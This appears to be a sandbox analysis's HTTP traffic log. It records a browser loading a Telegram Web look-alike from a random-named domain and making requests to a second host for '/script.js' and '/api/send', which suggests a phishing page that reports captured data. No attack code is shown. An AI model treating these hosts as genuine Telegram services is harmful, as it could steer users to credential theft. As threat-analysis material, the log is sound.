Source: global trafficHTTP traffic detected: GET /script.js HTTP/1.1Host: hu.bafanglaicai.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /7784.df07a876b22e3b2a83e9.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wkybcnfuqpgjx.ltd/3559.80b270ba0e217557b392.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat-bg-pattern-light.ee148af944f6580293ae.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/main.949acaf34f3882f511ff.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat-bg-br.f34cc96fbfb048812820.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /5193.75042954cc9da1f6d6ac.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /5648.343cae73c4dc2e71af86.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wkybcnfuqpgjx.ltd/3559.80b270ba0e217557b392.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /3559.80b270ba0e217557b392.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /telegram-logo.1b2bb5b107f046ea9325.svg HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/main.949acaf34f3882f511ff.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /8673.1b6dd8d303b0535cc1f8.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /7784.df07a876b22e3b2a83e9.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /chat-bg-pattern-light.ee148af944f6580293ae.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiws HTTP/1.1Host: zws2.web.telegram.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://wkybcnfuqpgjx.ltdSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: slccbJReovRGbPYhhvhUng==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: binary
Source: global trafficHTTP traffic detected: GET /5648.343cae73c4dc2e71af86.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /2976.4e6e9b1254ce313f06c5.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /8673.1b6dd8d303b0535cc1f8.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /5284.41380bbee618193f889a.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://wkybcnfuqpgjx.ltd/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /telegram-logo.1b2bb5b107f046ea9325.svg HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /site.webmanifest HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /5905.db5d2749ecb90aaf2752.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://wkybcnfuqpgjx.ltd/2976.4e6e9b1254ce313f06c5.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /2976.4e6e9b1254ce313f06c5.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icon-192x192.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/send HTTP/1.1Host: hu.bafanglaicai.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /icon-192x192.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rlottie-wasm.f013598f1b2ba719f25e.js HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://wkybcnfuqpgjx.ltd/2976.4e6e9b1254ce313f06c5.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rlottie-wasm.wasm HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wkybcnfuqpgjx.ltd/2976.4e6e9b1254ce313f06c5.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiws HTTP/1.1Host: zws2.web.telegram.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://wkybcnfuqpgjx.ltdSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: WrRtoR/HlyjyXfTPMkvI3g==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: binary
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiws HTTP/1.1Host: zws2-1.web.telegram.orgConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://wkybcnfuqpgjx.ltdSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: v7p9GlL4zYThdh2pidVMrw==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: binary
Source: global trafficHTTP traffic detected: GET /rlottie-wasm.wasm HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wkybcnfuqpgjx.ltd/2976.4e6e9b1254ce313f06c5.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=275924-275924If-Range: "674840b0-4d890"
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rlottie-wasm.wasm HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wkybcnfuqpgjx.ltd/2976.4e6e9b1254ce313f06c5.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=275924-317583If-Range: "674840b0-4d890"
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f1.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f8.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1e9.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1f4.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /apiw1 HTTP/1.1Host: zws2.web.telegram.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1ee.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f3f4-200d-2620-fe0f.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://wkybcnfuqpgjx.ltd/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e9-1f1ff.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /img-apple-160/1f1e6-1f1eb.png HTTP/1.1Host: wkybcnfuqpgjx.ltdConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
